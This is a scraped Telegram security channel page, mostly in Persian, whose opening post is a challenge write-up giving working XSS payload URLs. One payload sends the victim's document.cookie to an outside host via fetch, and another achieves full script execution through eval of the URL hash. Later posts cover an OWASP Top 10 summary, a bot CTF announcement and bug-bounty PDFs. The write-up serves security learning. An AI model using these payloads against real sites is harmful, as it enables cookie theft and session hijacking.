Hack Hive – Telegram
Hack Hive
1.08K subscribers
25 photos
3 videos
19 files
131 links
Download Telegram
Forwarded from BugBounty & Hacking Resources (Meydi)
خب چلنج شاهرخ خیلی خوب بود چون ریسترکشن هاش زیاد بود و واسه بیشتر راه ها دستمونو میبست
منم روش اصلی رو اصلا نمیدونستم و واقعا باحال بود . اینکه window.name توی کروم برای هر تب (window) مقدارش بعد از جابه جایی بین origin های مختلف تغییر نمیکنه


حالا روشی که من رفتم (steal cookie only):

https://rouhbakhsh.xyz/index2.php?j&q=x%22;window.onload=fetch;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22//google.com/%22;Event.prototype.message=document.cookie//


من یه چیز خیلی جالبو فهمیدم و با اون تونستم کوکیو بدزدم.

تیکه کد پایینو ببینید:


window.onload=alert;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name



بعد از اینکه روش های مشابه اینو رفتم دیدم
متوجه شدم که prototype میتونه property های متفاوتی داشته باشه مثل message
حالا اومدم هردو رو باهم نوشتم و یه چیز خیلی عجیب دیدم




window.onload=alert;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name="name";Event.prototype.message="message"


و توی الرت:
‍‍name: message
اینو دیدم

و خب کار دیگه خیلی ساده شد:

https://rouhbakhsh.xyz/index2.php?j&q=x%22;window.onload=fetch;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22//google.com/%22;Event.prototype.message=document.cookie//


اینجوری کوکی رو میتونی بفرستی واسه هر سایتی که میخوای



روش بعدی FULL XSS

راستش از اولش هم دنبال این بودم که کامل xss کنم و حالا با اون گجت خیلی کارا میشد کرد:

Event.prototype.name="window.location=javanoscript"


window.location=javanoscript : (Event.prototype.message)


من اینجا به بعد سریع به جواب رسیدم و چیز زیادیو تست نکردم. پس اگه با روش دیگه ای زدید حتما تو کامنت بگید:


حالا باید یه جوری مقدار message رو کد js میذاشتم. و متاسفانه اینجا نتونستم با hash بزنم چون مستقیم هشتگ میفتاد اون اول و خرابش میکرد.


javanoscript:#anything


ایده ای که سریع به ذهنم رسید
این بود که با
location.pathname
بزنمش

و اینجا یه گجت دیگه هم پیدا کردم:
CSPT



https://rouhbakhsh.xyz//%0Aeval(location.hash.substr(1))'//%2f..%2findex2.php?q=x%22;window.onload=setTimeout;Event.prototype.toString=DOMException.prototype.toString;Event.prototype.name=%22window.location=%27javanoscript%22;Event.prototype.message=location.pathname//#alert(origin)

میخواید پیلود رو ببینید چطوری شده. اون setTimeout رو بکنید alert


تشکر زیاد از شاهرخ:
@Sharo_K_h
🔥81
Forwarded from 🕸 Articles
Domain_Discovery_Persian.pdf
8.3 MB
Author: zarvan
Language: Persian
Telegram channel: @web_articles
2
Forwarded from HackMeLocal
🕹 مینی‌چالش آغاز شد

یک ربات شبیه‌سازی شده ساخته‌ایم که هدفش بررسی دیتابیس‌های لو رفته و اطلاع‌رسانی به کاربر در صورت وجود اطلاعاتش است.

ما می‌دونیم به نحوی شخصی به تمام اطلاعات دیتابیس ما دسترسی داره تمام پیام‌های دریافتی از سمت کاربر را امن کردیم اما همچنان می‌تواند اطلاعات موجود در دیتابیس ما را مشاهده کند.

در کل می‌تونید از این ربات استفاده کنید
@HML_Simulation2_Bot


📌 طبق روال، هر کسی که First Blood بشه، رایت‌آپش داخل کانال منتشر میشه!

#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal

@HackMeLocal
3
The OWASP Top 10 is a community-driven list of the most critical web application security risks. It exists to raise awareness, guide developers and security teams, and serve as a baseline for testing and hardening applications. Organizations use it for threat modeling, training, and setting minimum security requirements; the list is updated periodically to reflect changing attack trends.

#owasp_stories
@hackhive_channel 🐝
3
Hack Hive
The OWASP Top 10 is a community-driven list of the most critical web application security risks. It exists to raise awareness, guide developers and security teams, and serve as a baseline for testing and hardening applications. Organizations use it for threat…
The OWASP Top 10 list was updated in 2021 to reflect modern threats. Compared to 2017, some risks changed position, some were renamed, and new categories appeared. Broken Access Control rose to the top, Sensitive Data Exposure evolved into Cryptographic Failures, and Insecure Design, Software and Data Integrity Failures, and SSRF were introduced. This update highlights how web application risks evolve and why organizations must continuously adapt their security practices.

#owasp_stories
@hackhive_channel 🐝
5
Hack Hive
The OWASP Top 10 list was updated in 2021 to reflect modern threats. Compared to 2017, some risks changed position, some were renamed, and new categories appeared. Broken Access Control rose to the top, Sensitive Data Exposure evolved into Cryptographic Failures…
#number1:
Broken Access Control

Broken Access Control happens when applications fail to properly enforce who can access what. As a result, users may read or modify data, escalate privileges, or reach hidden resources. It often shows up as IDOR, missing server-side checks, or misconfigured CORS. Preventing it requires strict server-side authorization, deny-by-default policies, and proper validation of ownership and roles.
Main Categories:

Insecure Direct Object References (IDOR)

Sensitive Data Exposure via weak access rules

Authentication & Authorization Issues

Metadata Manipulation (cookies, tokens, JWT)

Misconfiguration (CORS, forced browsing, open redirect)

Functional Level Access Control Issues

For more information:
https://m.youtube.com/watch?v=_jz5qFWhLcg&pp=ygUfI2Jlc3RidWdib3VudHlib29rc2ZvcmJlZ2lubmVycw%3D%3D


#owasp_stories
@hackhive_channel 🐝
🔥411👍1
Forwarded from 🕸 Articles
این کتاب توصیه‌های ارزشمند و کاربردی از گروهی از هکرهای با تجربه در حوزه باگ‌بانتیه که برای موفقیت تو این عرصه جمع‌آوری شدن. این راهنمایی‌ها از تکنیک‌های عمیق تست و استفاده از اتومیشن گرفته تا تمرکز روی نقاط ضعف خاص و مدیریت زمان، بهت کمک می‌کنه مهارت‌هات رو تقویت کنی و باگ‌های با ارزشی پیدا کنی.
3
Forwarded from 🕸 Articles
Final Collection of Advice_Persian.pdf
1.3 MB
Author: zarvan
Language: Persian
Telegram channel: @web_articles